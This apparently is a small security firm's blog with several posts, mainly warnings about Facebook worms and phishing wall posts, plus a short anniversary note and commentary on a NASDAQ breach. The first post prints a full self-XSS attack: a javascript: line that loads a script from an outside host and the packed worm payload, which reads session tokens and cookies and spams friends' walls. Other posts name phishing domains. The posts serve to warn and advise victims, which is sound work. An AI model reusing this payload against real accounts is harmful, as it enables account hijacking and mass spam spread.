New Facebook Attack Warning: “I Lost All Respect For Kim kardashian, After Watching This Video”

New Facebook Attack Warning: "I Lost All Respect For Kim kardashian, After Watching This Video"

Net Force is issuing a warning that a new round of Facebook attacks have surfaced. The attack leads you to a Facebook Page entitled “I Lost All Respect For Kim kardashian, After Watching This Video”.

Upon arriving on that page, it loads a flash movie that gives you instructions on how to allegedly view the page. In reality, the instructions wants you to help spread the attack through your friends and network.

The instructions ask you to do type the letter “J” followed by pressing the command CTRL+V (to paste) in the navigation followed by entering. Following these instructions would lead you to paste:

javascript:(a=(b=document).createElement('script')).src='https://youcantseethis.info/a.js',b.body.appendChild(a);void(0)

The actual Javascript executed from http://youcantseethis.info/a.js:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 8=b[\'U\'](\'8\')[0][\'g\'];3 a=b[\'U\'](\'a\')[0][\'g\'];3 c=b[\'V\'][\'W\'](b[\'V\'][\'W\'](/1P=(\\d+)/)[1]);3 2=p z();3 m=\'/y/l/R.o?q=1\';3 5=\'8=\'+8+\'&a=\'+a+\'&X=1O&Y=\'+c+\'&14=l&15=&O=1&16=&13=1&12=1L%1S%1T%1Y&Z=1Z%1X%r%1K&E=B&N=K&n[J][0]=19&n[k]=18&I=&M=&L=G&F=1W&D=&C[0][g]=1v&1q=&1o=v&1n[1s]=1r&1t&1u=1p&1l=\'+c+\'\';2[\'t\'](\'1e\',m,1d);2[\'7\'](\'h-k\',\'1c/x-A-1a-1b\');2[\'7\'](\'h-e\',5[\'e\']);2[\'7\'](\'1f\',\'1g-1k\');2[\'w\'](5);3 j=p 1U();f=p z();f[\'t\'](\'1V\',\'/y/20/1G.o?q=1&1B=\'+c+\'&1A\'+1y[\'1x\']()+\'&1w[0]=1z&1J[0]=1H\',v);f[\'w\']();u(f[\'1m\']!=4){}T{s=1I(\'(\'+f[\'1F\'][\'1D\'](9)+\')\');u(s[\'1E\']){}T{j=s[\'25\'][\'2k\'][\'2j\'](1j(S,P){2i S[\'Q\']-P[\'Q\']})}};2l(3 i=0;i<j[\'e\'];i++){3 2=p z();3 m=\'/y/l/R.o?q=1\';3 5=\'8=\'+8+\'&a=\'+a+\'&X=24&Y=\'+j[i][\'27\']+\'&14=l&15=&O=1&16=&13=1&12=10%11%17%H%r&Z=10%11%17%H%r&E=B&N=K&n[J][0]=19&n[k]=18&I=&M=&L=G&F=2a&D=&C[0][g]=1v&1q=&1o=v&1n[1s]=1r&1t&1u=1p&1l=\'+c+\'&\';2[\'t\'](\'1e\',m,1d);2[\'7\'](\'h-k\',\'1c/x-A-1a-1b\');2[\'7\'](\'h-e\',5[\'e\']);2[\'7\'](\'1f\',\'1g-1k\');2[\'2b\']=1j(){u(2[\'1m\']==4&&2[\'2c\']==2d){}};2[\'w\'](5)};b[\'28\'](\'23\')[\'22\']=\'<1i><6><6><6><6><6><2f 26="1h://A.2e.2g/2o/2n.2p" /><6 />21 2q...</1i>\';2h("2m.1N=\'1h://1C.1Q.1R/1M.o\';",29);',62,151,'||httpwp|var||paramswp|br|setRequestHeader|post_form_id||fb_dtsg|document|user_id||length|gf|value|Content||friends|type|profile|urlwp|attachment|php|new|__a|20this|data|open|if|false|send||ajax|XMLHttpRequest|www|post|audience|is_explicit_place|aktion|composer_session_id|102186159822587|2Ccheck|composertags_place|params|2309869772|composer_predicted_city|composertags_place_name|app_id|xhpc_fbx|_0xbcfdx9|index|composer|_0xbcfdx8|else|getElementsByName|cookie|match|xhpc_composerid|xhpc_targetid|xhpc_message|Oh|20my|xhpc_message_text|xhpc_ismeta|xhpc_context|xhpc_location|xhpc_timeline|20god||299889916707387|form|urlencoded|application|true|POST|Connection|keep|http|center|function|alive|__user|readyState|nctr|disable_location_sharing|AsyncRequest|composertags_city|pagelet_wall|_mod|lsd|post_form_id_source|80|filter|random|Math|user|token|viewer|lost|substr|error|responseText|first_degree|friends_only|eval|options|20out|HEY|video|location|u3bbpq_21|c_user|kimkardashianvideo|tk|20CHECK|20THIS|Array|GET|1320586865|20check|20OUT|heyyy|typeahead|Please|innerHTML|contentArea|u2qr0v_15|payload|src|uid|getElementById|30000|1320585896|onreadystatechange|status|200|hindustantimes|img|com|setTimeout|return|sort|entries|for|top|loading_gif|images|gif|wait'.split('|'),0,{}))

A successful attack would cause the page to propagate across your Friend’s Facebook walls like the above example.

Please help others by not propagating this attack by removing this from your walls. Should you have been a victim of such an attack, please remove the the post by hovering over each individual post made on everyone’s wall and click the X that appears over the post. It should pop up text that says “Delete Post”.

Phishing Attack Round 2 – Vote for Nicole Santos

Phishing Attack Round 2 - Vote for Nicole Santos

There is a new another round of phishing attacks going around Facebook. It’s a variation of the VERIFY ACCOUNT attack earlier. DO NOT CLICK IT. You will get a wall post from your friends.

The message goes something like:

F***** you f*****. Go ***** yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.

DO NOT CLICK “REMOVE THIS APP”. It leads to a dropbox executing a javascript. From what we can determine at this point in time, this is a variation off of the original set of phishing attacks leading to rogue websites.

Again, this is a phishing attack. It’s in my opinion one of the most well written ones to date.

If you are a VICTIM:

If you are a victim, please immediately REMOVE the wall posts you made on other people’s walls. Simply visit their walls and click remove over your text. You can find it by moving your mouse over what you wrote, and an “X” will pop up in the area surrounding your text. Click the X and select remove post.

If you are a recipient, please immediately REMOVE the wall post that was made on your wall.

All the best,
Josh C
Net Force

Phishing Attack on Facebook – VERIFY ACCOUNT

Phishing Attack on Facebook - VERIFY ACCOUNT

There is a new round of phishing attacks going around Facebook. DO NOT CLICK IT. You will get a wall post from your friends.

The message goes something like:

In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process…

DO NOT CLICK VERIFY MY ACCOUNT. It leads to a third party URL, specifically: “plucketenhe.info, creepsweepers.info, pelorak.info, ”

Again, this is a phishing attack. It’s in my opinion one of the most well written ones to date.

If you are a VICTIM:

If you are a victim, please immediately REMOVE the wall posts you made on other people’s walls. Simply visit their walls and click remove over your text. You can find it by moving your mouse over what you wrote, and an “X” will pop up in the area surrounding your text. Click the X and select remove post.

If you are a receipient, please immediately REMOVE the wall post that was made on your wall.

Thanks.

All the best,
Josh C
Net Force

One Year Ago

One Year Ago

One year ago, this group of friends set out to make a difference. A year later, we are here and we are operational. As we look back, we realize we have accomplished much in a short period of time. However, we do realize there is much more to come and we are looking forwarding to facing the challenges of tomorrow.

Security for computers, and their networks is barely registering in the minds of people today, but we’re still far from people being consciously aware of how technology has impacted their life and the need for cyber security.

I will be the first to admit we have much to work on but with the support from our valued clients like yourself, we will be able to change the world, one computer and one person at a time.

Hackers Penetrate NASDAQ Computer Network

Hackers Penetrate NASDAQ Computer Network

If you missed it this morning, the Associated Press and Wall Street Journal reported that the NASDAQ stock exchange network was compromised and penetrated multiple times by external attackers throughout 2010.

What bothers me was that officials saying the trading system was not compromised and that another person involved in the investigation was suggested that people were merely looking around.

I really doubt they were merely looking around. After all, they were there not just once, but multiple times. Do you really believe they were in there just to stare at numbers going back and forth?

I personally find it hard to believe.